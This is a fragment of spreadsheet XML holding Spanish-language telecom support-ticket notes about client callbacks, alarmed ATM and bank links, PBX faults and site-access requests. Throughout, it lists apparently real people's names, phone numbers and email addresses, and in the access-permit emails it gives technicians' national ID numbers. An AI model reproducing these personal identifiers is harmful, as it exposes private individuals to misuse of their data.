    <t>SE RECIBE LLAMDA DE TECNICO CARLOS GODINEZ COMENTA QUE NO HAY PERSONAL DE TAVSA EN SITIO, SE LLAMA A CLIENTE 5B ATIENDE FREDY SIMON COMETNA QUE SE LE PUEDA LLAMAR EN 15 MINUTOS O ESTARA CONTESTANDO CORREO PARA VALIDAR PERSONAL DE TAVSA FALLA EN PC
3001357245
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4818
DURACIÓN: 0:03:25
ESTADO: CONECTADA
DETALLES: 4818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 1/07/2022 13:16:22</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FREDY SIMON AL 24207212 SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
-ID 3001363630
**</t>
  </si>
  <si>
    <t>F4618760</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARIEL MENDEZ 57981192 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001521794</t>
  </si>
  <si>
    <t>F4618778</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 00525551745290 CONTESTA LA SEÑORITA  FRIDA SOLICITA UN MOMENTO PERO DEJA LLAMADA EN ESPERA Y NO LA RETOMA || SE INTENTARA LUEGO **
-ID 2001577077
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 525551745290 RESPONDE GERARDO MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO Y ESTABLE
-ID 2001614613</t>
  </si>
  <si>
    <t>F4618779</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS 34332517 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001561964</t>
  </si>
  <si>
    <t>F4618785</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LETICIA ALCOT AL 59747848 INDICA QUE AUN NO CUENTA CON SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 2001524404
**</t>
  </si>
  <si>
    <t>F4618795</t>
  </si>
  <si>
    <t>CLIENTE CONFIRMA VISITA PARA MAÑANA A LAS 10:00HRS
DE: OPERADORES ATM 2 &lt;OPERADORES.ATM2@TAV.COM.GT&gt;
ENVIADO: LUNES, 27 DE JUNIO DE 2022 16:01
PARA: LGALINDO@5B.COM.GT &lt;LGALINDO@5B.COM.GT&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;; LUIS BOSARREYES &lt;LBOSARREYES@5B.COM.GT&gt;
CC: OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: F4618795 || 5B || CC_TYT_GT_ATM3371 || FARMACIA CRUZ VERDE
BUEN DÍA
ESTIMADOS:
SE CONFIRMA VISITA PARA EL DÍA DE MAÑANA A LAS 10:00HRS.
SALUDOS,
MY LOGO
TRANSPORTE Y
ADMINISTRACION DE
VALORES S.A
FERNANDO DÓNIS
T.
3013-4564
D.
6 AVENIDA 16¿76, ZONA 10
C.
OPERADORES.ATM2@TAV.COM.GT</t>
  </si>
  <si>
    <t>F4618813</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO ETX-1 ALARMADO, PROCEDE A REINICIARLO PERO CONTINÚA ALARMADO, SE ABRIRÁ WO, SE TIENE POSIBLE PROBLEMA CON FIBRA.
PWR/ALM/TST ROJO
CH3 VERDE</t>
  </si>
  <si>
    <t>F4618817</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALVARO RAMIREZ AL 78626575  NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 2001583325
**</t>
  </si>
  <si>
    <t>F4618838</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JOSE REYES, CLIENTE INDICA QUE SE CORTAN LAS LLAMADAS A LOS 30SEGUNDOS.
SE REALIZA UNA PRUEBA DE LLAMADA Y SE CORTA EN ESE TIEMPO.
SE APERTURA WO A BOCORE PARA QUE SE REALICE UNA TRAZA Y VER QUIEN ESTA CORTANDO LA LLAMADA.
2001548759
COLA:
NOMBRE: A: 0050671085764
NÚMERO: 0050671085764
DURACIÓN: 0:00:17
ESTADO: MARCANDO
DETALLES: 0050671085764
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 27/06/2022 14:20:21</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JOSE REYES PARA INDICARLE QUE EL PROBLEMA ES SU PBX PERO NO CONTESTA.
SE LLAMARA ENSEGUIDA.
2001578386, 2001578510
COLA:
NOMBRE: A: 0050671085764
NÚMERO: 0050671085764
DURACIÓN: 0:00:05
ESTADO: MARCANDO
DETALLES: 0050671085764
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 27/06/2022 15:49:32</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 506 71085764 PARA SEGUIMIENTO, NO CONTESTA; LLAMAR MAÑANA EN EL TRANSCURSO DEL DÍA; HAY CORREO DE REFERENCIA:
ASUNTO: SD1139093 GRUPO SOLIDO GDN 44041160</t>
  </si>
  <si>
    <t>SE ENVIO EL SIGUIENTE CORREO AL CLIENTE.
BUENAS TARDES,
ESTIMADO POR ESTE MEDIO LE INFORMAMOS QUE SE REALIZO LA REVISION DE LA LINEA SIP 44041160.
Y SE VERIFICA QUE LA PBX ESTA MAL CONFIGURADA POR LO SIGUIENTE:
SE REALIZAN PRUEBAS SE OBSERVA QUE EL IVR AL SELECCIONAR UN NÚMERO (EJEMPLO 1) DA UNA LOCUCIÓN EN INGLÉS EN LA CUAL INDICA QUE SE REVISE EL EQUIPO. AL DEJAR EL IVR CORRIENDO LO QUE SE OBSERVA EN LA TRAZA ES QUE SE ENVÍAN VARIAS VECES EL MENSAJE DE RETRANS MESSAGE A UNA IP 186.179.68.241 ESTA IP SE OBSERVA QUE LA MANDAN EN UN 200 OK EN EL CONTACT: &lt;SIP:186.179.68.241:5060&gt; SE ACONSEJA REINICIAR LA PBX O VALIDAR CON EL PROVEEDOR DE LA PLANTA.
QUEDO A LA ESPERA DE SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>F4618886</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GABBRIEL AL 50179197 NO CONTESTA || ENVIA A BUZON ||SE INTENTARA LUEGO**
-ID 2001716876 - 2001717157
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS GABRIEL 50179197 MENCIONA QUE PERSISTE EL INCONVENIENTE PERO YA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 10:00 HRS
-ID 2001608412</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GABRIEL INDICA QUE NO ESTA EN SITIO SOLICITA QUE SE LE LLAME A LAS 11:30 NUEVAMENTE QUE SE ENCONTRARA AHI **
-ID 2001698309
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GABRIEL PARA VALIDAR SERVICIO SIN EMBARGO NO RESPONDE--
50179197</t>
  </si>
  <si>
    <t>F4618915</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO RAMOS 33945410 CLIENTE CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001564123</t>
  </si>
  <si>
    <t>F4618919</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE SATURNINO TUM, QUIEN VA APOYAR A REVISAR EQUIPOS.
2001546793
COLA:
NOMBRE: A: 54612886
NÚMERO: 54612886
DURACIÓN: 0:00:18
ESTADO: CONECTADA
DETALLES: 54612886
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 27/06/2022 14:13:29</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE. SE ABRIRA LA WO CUANDO EL TECNICO YA INGRESE A LAS INSTALACIONES.
BUENAS TARDES,
POR ESTE MEDIO SOLICITAMOS DE SU APOYO CON EL INGRESO AL TÉCNICO
OSCAR ESTUARDO VALDEZ LÓPEZ DPI  2304 32816 0901
PARA REVISIÓN DE LA LÍNEA TELEFÓNICA 79618800.
PARA EL DÍA DE HOY Y MAÑANA.
QUEDO A LA ESPERA DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4618924</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE MARCO TULIO 55161245 / 55274697 ID: 2001621244 / 2001621273
CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE TKT | SE NOTIFICA A ALEJANDRO.NAVARRO VIA SKYPE | WIP
*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCO AL  55161245 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001585314
**</t>
  </si>
  <si>
    <t>-* SE HABLA CON MARCO TULIO 55161245  (CLIENTE) INFORMA QUE TIENEN ALARMADO EL EQUIPO QUE LES BRINDA LA RED INTERNA MARCA VELOCLOUD, SE INTENTA LOCALIZAR A LA CENTRAL 25041690 NO RESPONDEN, CLIENTE INFORMA QUE TRATARÁ DE REPORTAR CON SU CENTRAL, SE LLAMARA EN 1 HORA PARA VALIDAR -*
-*</t>
  </si>
  <si>
    <t>F4618936</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MARITZA GOMEZ 22703881 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001665906</t>
  </si>
  <si>
    <t>F4618947</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA CORREO AL CLIENTE
VIADO: LUNES, 27 DE JUNIO DE 2022 14:32PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARAMADO PARA CLIENTE "CC_BANRURAL_GT_AGENCIA_03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8947
ID: 8901211T
IDENTIFICADOR DEL CLIENTE:  CC_BANRURAL_GT_AGENCIA_0343
UBICADO EN:  CANTON CENTRO, EDIFICIO MUNICIPAL, SAN MATEO IXTATAN, HUEHUETENANGO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4618953</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SANTOS HENRIQUEZ AL 79896386 INDICA QUE QUIERE QUE SE LE BRINDE INFORMACION PARA PODER CONFIGURAR  SUS EQUIPOS  **
-ID 2001586538
**</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 16:34
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; SANTOS HENRIQUEZ &lt;SANTOS.HENRIQUEZ@TLP-ES.COM&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
CC: SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ID1182047 / TEXTILES LA PAZ L.L.C.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4618974</t>
  </si>
  <si>
    <t>SE NOTIFICA ALARMA EN EL MONITOREO PROACTIVO
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM99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8974
ID: 47504218T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM9999
UBICADO EN: 50242199759_CENTRO COMERCIAL PLAZA MAGDALENA, LOCAL 52, COBAN ALTA VERAPAZ_PAIZ CENTRO COMERCIAL PLA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4618981</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 27 DE JUNIO DE 2022 14:53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HERNANDEZ RIVERA, OSCAR ALONSO &lt;HERNANDEZ.OSCAR@CLARO.COM.SV&gt;; GRANADOS ALVARADO, NELIA GEORGINA &lt;GRANADOS.NELIA@CLARO.COM.SV&gt;; MESA DE SERVICIO &lt;MESADESERVICIO@BANCOAGRICOLA.COM.SV&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_BANCO_AGRICOLA_SV_IP200126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8981
ID: IP2001261
IDENTIFICADOR DEL CLIENTE:  CC_BANCO_AGRICOLA_SV_IP2001261
UBICADO EN:  ANTIGUO CUSCATLAN     FINCA EL ESPINO     AVENIDA CHILTIUPAN            LOTE 14         COM.URB.EL ESPINO/PUMA PEDREGA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4619011</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS GONZALES 58549594 MENCIONA QUE APLICO REINICIO A LOS EQUIPOS ADICIONAL CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001569839</t>
  </si>
  <si>
    <t>F4619019</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 27 DE JUNIO DE 2022 15:39PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM482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9019
ID: 47503900T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM4828
UBICADO EN:  CAJERO 4828_3A AVENIDA 5-23 ZONA 1 DE TECUN UMAN AYUTLA SAN MARCOS_BAM AGENCIA TECUN UMAN
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>CLIENTE
INDICA
DE: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;ENVIADO: LUNES, 27 DE JUNIO DE 2022 16:07PARA: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;ASUNTO: RE: [SOLICITUD :##RE-766528##] : ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM4828"
SE VALIDARA FALLA.
ANTHONY GARCIA
SERVICIOS 5BPBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>F4619037</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA ELABORACION DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 12:00
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE RFO || SERVICIOS FINANCIEROS ENLACE S.A. || F4619037
BUEN DÍA
    SOLICITO DE SU APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA 	ID 	TICKET
SERVICIOS FINANCIEROS ENLACE S.A.
IPG003097SV
F4619037 - SD1139129
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A DICTAMENES
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 1 DE JULIO DE 2022 10:40
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE RFO || SERVICIOS FINANCIEROS ENLACE S.A. || F4619037
*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANKLIN GARZONA 25112640 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE PERO SOLICITA RFO
FGARZONA@ENLACE.COM.SV
-ID 2001724035</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANKLIN GARZONA 25112640 PARA SOLICITAR DATOS DE VISITA
-ID 2001588216
NOMBRE DEL CLIENTE: SERVICIOS FINANCIEROS ENLACE S.A. DE C.V.
UBICACIÓN:CC PLAZA VEGA LOCAL 4-B CARA SUCIA AGUASHAPAN
CONTACTO EN SITIO: VICTOR RUIZ - 76024321
HORARIO DE ATENCION:CLIENTE ESTARA ESPERANDO A PERSONAL TECNICO EN PR
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4619056</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO A CLIENTE PARA VALIDAR QUE EQUIPO ASMI EN ATM ESTE ENERGIZADO CORRECTAMENTE
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE ALARMADO EN NUESTRO MONITOREO SOLICITAMOS SU APOYO VALIDANDO QUE EQUIPO EN ATM DE MARCA ASMI QUE CONECTA AL EQUIPO TELDAT SE ENCUENTRE CORRECTAMENTE ENERGIZADO YA QUE SE OBSERVA EN EL TELDAT PUERTO WAN PRINCIPAL EN ESTADO DOWN, ACTUALMENTE OPERATIVO ÚNICAMENTE POR REDUNDANCIA 3G.
TICKET: F4619056
ID:  47501334T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ ATM1304
UBICADO EN: KM.14.5 CARR AL ATLANTICO ZONA 18 SUPER DEL BARRIO HERMANO PEDRO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, Y CONFIRMA EN LLAMDA QUE LO RECIBIO, SE TENDRAN AVANCES EN 2 HORAS.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 11:33
PARA: MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; SERVICIOS5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;
CC: JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: ALARMA DEL CAJERO: CC_TYT_GT_ATM1304
ESTIMADO CLIENTE.
EN SEGUIMIENTO AL ENLACE ALARMADO EN NUESTRO MONITOREO SOLICITAMOS SU APOYO VALIDANDO QUE EQUIPO EN ATM DE MARCA ASMI QUE CONECTA AL EQUIPO TELDAT SE ENCUENTRE CORRECTAMENTE ENERGIZADO YA QUE SE OBSERVA EN EL TELDAT PUERTO WAN PRINCIPAL EN ESTADO DOWN, ACTUALMENTE OPERATIVO ÚNICAMENTE POR REDUNDANCIA 3G.
TICKET: F4619056
ID: 47501334T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1304
UBICADO EN: KM.14.5 CARR AL ATLANTICO ZONA 18 SUPER DEL BARRIO HERMANO PEDRO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SU COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE PARA SOLICITAR AVANCES PERO ME INDICA QUE NO TIENEN NINGUN CORREO POSIBLE QUE NO SE HAYA ADJUNTADO LOS GRUPOS CORRESPONDIENTES.
2001930086
COLA:
NOMBRE: A: 24207200
NÚMERO: 24207200
DURACIÓN: 0:06:16
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24207200
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 29/06/2022 11:35:29</t>
  </si>
  <si>
    <t>F4619067</t>
  </si>
  <si>
    <t>CLIENTE CLAUDIA MEJIA 47680775 REALIZA PRUEBAS DE LLAMADA Y VALIDA EL E1 ACIVO. AUTORIZA EL CIERRE DEL CASO.
RESULTADO: LLAMADA HECHA
NOMBRE: 47680775
NÚMERO: 47680775
INICIO: HOY, 07:56 A. M.
FIN: HOY, 07:57 A. M.
DURACIÓN: 0:57
ID DE LLAMADA: 2001641807</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA MEJIA 47680775 MENCIONA QUE ESTA EN LINEA CON OTRO COMPAÑERO QUE LE ESTA BRINDANDO SOPORTE
-ID 2001587489</t>
  </si>
  <si>
    <t>F4619090</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 27 DE JUNIO DE 2022 18:02
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; DIRECCION DE TELECOMUNICACIONES &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: TICKET 1139145 ID 8901233 AGENCIA 697
BUENA TARDE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO, PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO.
DIRECCIÓN:  CALLE PRINCIPAL DE ALDEA  SANYUYO, JALAPA
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS.
710148 JOSE VICTOR RIVAS BALCARCEL          3054143640207
589939 PEDRO LUIS GARCIA MORAN             1973 70659 0101 58261406
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES
ATT</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE RAYMON, CONFIRMA QUE LOS EQUIPOS ESTAN ENCENDIDOS, APLICA REINICIO PERO ENLACE CONTINUA DOWN.</t>
  </si>
  <si>
    <t>F4619091</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERAL PEREZ/58107183 MENCIONA QUE NO LLEGA AL ANCHO DE BANDA CONTRATADO, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001593336</t>
  </si>
  <si>
    <t>F4619092</t>
  </si>
  <si>
    <t>CLIENTE  RICARDO CASTILLO INDICA QUE EL AVISARÁ AL CHAT DE WHATSAPP DE ACCESOS EMPRESARIALES EN EL MOMENTO QUE TENGA LA FALLA PARA PODER VALIDAR TRAZAS EN EL AETHRA.
2001656000
COLA:
NOMBRE: A: 0050376029460
NÚMERO: 0050376029460
DURACIÓN: 0:07:30
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050376029460
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 28/06/2022 08:55:04</t>
  </si>
  <si>
    <t>F4619097</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAVID PAREDES 41782794 QUIEN SOLICITA LLAMADA EN 30 MIN YA QUE ESTA EN SU HORA DE ALMUERZO
-ID 2001741880</t>
  </si>
  <si>
    <t>SE LLAMAA A CLIENTE DAVID PAREDES-41782794 ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  DAVID PAREDES 41782794  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001751968</t>
  </si>
  <si>
    <t>F4619098</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALBER JOSE ROMERO 22116089 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001595315</t>
  </si>
  <si>
    <t>F4619099</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ALDO ORELLANA CLIENTE APOYA A REVISAR EL OP108L E INDICA QUE EL LINK A EN ROJO, SE APLICO RESET PERO NO HAY CAMBIOS.
CLIENTE INDICA QUE SE RETIRA A LAS 17:00HRS SOLICITA VISITA PARA MAÑANA A LAS 8:00AM
2001578838
COLA:
NOMBRE: A: 0050376157618
NÚMERO: 0050376157618
DURACIÓN: 0:00:20
ESTADO: CONECTADA
DETALLES: 0050376157618
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 27/06/2022 15:51:31</t>
  </si>
  <si>
    <t>F4619105</t>
  </si>
  <si>
    <t>CLIENTE SONIA BORJA 78543225 REALIZA PRUEBAS Y VALIDA EL E1 ACTIVO, INDICA QUE REINICIÓ SU PLANTA PBX. VALIDA QUE YA TIENE LLAMADAS ENTRANTES Y SALIENTES, AUTORIZA EL CIERRE DEL CASO.
2001654521
COLA:
NOMBRE: A: 0050378543225
NÚMERO: 0050378543225
DURACIÓN: 0:01:52
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050378543225
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 28/06/2022 08:44:59 A. M.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SONIA BORJA 78543225 MENCIONA QUE PERSISTE EL INCONVENIENTE CON LAS LLAMADAS
SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001598926</t>
  </si>
  <si>
    <t>F4619107</t>
  </si>
  <si>
    <t>SE ENVIA CORREO DE GESTION DE ACCESOS
RE: SOLICITUD DE PRUEBAS IP2042023 || BANCO AGRICOLA S.A
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:JOSE ARTURO CORADO JIMENEZ;RODRIGUEZ CRISTOBAL, MIGUEL ANGELY 1 USUARIOS MÁS
CC:GRUPO N1;CNOCCA
MAR 28/06/2022 9:50
BUENOS  DIAS  ESTIMADO CLIENTE , SOLICITAMOS DE SU AMABLE APOYO BRINDANDO ACCESOS A NUESTRA AREA TECNICA, PRA TRABAJAR EN SERVICIO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FAVOR  INDICAR DIA Y HORA DE VISITA
SALUDOS,</t>
  </si>
  <si>
    <t>CLIENTE CONFIMA QUE RECIBIO EL CORREO CON LA INFORMACION, ADICIONAL INDICA QUE ESTARA RESPONDIENDO CUANDO TENGA GESTIONADOS LOS PERMISO
-ID 3001191336</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 30 DE JUNIO DE 2022 15:27
PARA: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; MESA DE SERVICIO &lt;MESADESERVICIO@BANCOAGRICOLA.COM.SV&gt;
